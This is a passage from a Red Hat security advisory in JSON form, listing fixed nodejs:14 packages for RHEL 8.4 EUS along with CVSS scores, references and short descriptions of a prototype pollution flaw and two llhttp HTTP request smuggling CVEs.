"AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "nodejs-json-schema: Prototype pollution vulnerability" }, { "cve": "CVE-2021-22959", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-10-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2014057" } ], "notes": [ { "category": "description", "text": "An HTTP Request Smuggling (HRS) vulnerability was found in the llhttp library, used by Node.JS. Spaces as part of the header names were accepted as valid. In situations where HTTP conversations are being proxied (such as proxy, reverse-proxy, load-balancer), an attacker can use this flaw to inject arbitrary messages through the proxy. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "llhttp: HTTP Request Smuggling due to spaces in headers", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22959" }, { "category": "external", "summary": "RHBZ#2014057", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014057" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22959", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22959" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22959", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22959" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/" } ], "release_date": "2021-10-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "llhttp: HTTP Request Smuggling due to spaces in headers" }, { "cve": "CVE-2021-22960", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-10-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2014059" } ], "notes": [ { "category": "description", "text": "An HTTP Request Smuggling (HRS) vulnerability was found in the llhttp library, used by Node.JS. During the parsing of chunked messages, the chunk size parameter was not validated properly. In situations where HTTP conversations are being proxied (such as proxy, reverse-proxy, load-balancer), an attacker can use this flaw to inject arbitrary messages through the proxy. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "llhttp: HTTP Request Smuggling when parsing the body of chunked requests", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", 